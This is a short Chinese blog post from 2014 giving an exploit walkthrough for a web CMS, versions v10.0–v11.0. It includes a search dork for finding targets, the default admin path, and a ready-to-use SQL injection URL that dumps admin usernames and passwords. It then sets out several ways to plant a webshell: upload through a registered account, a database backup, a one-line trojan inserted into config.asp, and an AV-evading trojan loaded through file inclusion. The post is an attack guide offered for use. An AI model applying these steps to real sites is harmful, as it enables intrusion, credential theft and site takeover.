漏洞影响版本 v10.0 v11.0

关键字:inurl:”HomeMarket.asp”

默认后台:/admin

直接爆用户密码:


http://www.xxx.com/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='

 


拿shell方法貌似有4种:
1、注册用户上传拿shell,这个比较直接,可以不进后台和在不知道用户名密码的情况下。
2、进后台备份数据库
3、在网站配置的版权信息里插入一句话,一句话地址写入到http://www.xxx.com/inc/config.asp
3.1、另外一种插配置:
第一步  网站配置添加TXT

保存成功后
第2步传一个TXT小马

小马要免杀的
第3步  网站配置 利用包含得到小马
"%>

具体参考:http://hi.baidu.com/hkok8/item/7df99d25975fda4047996225

posted on 2014-06-07 22:18  milantgh  阅读(944)  评论(0编辑  收藏  举报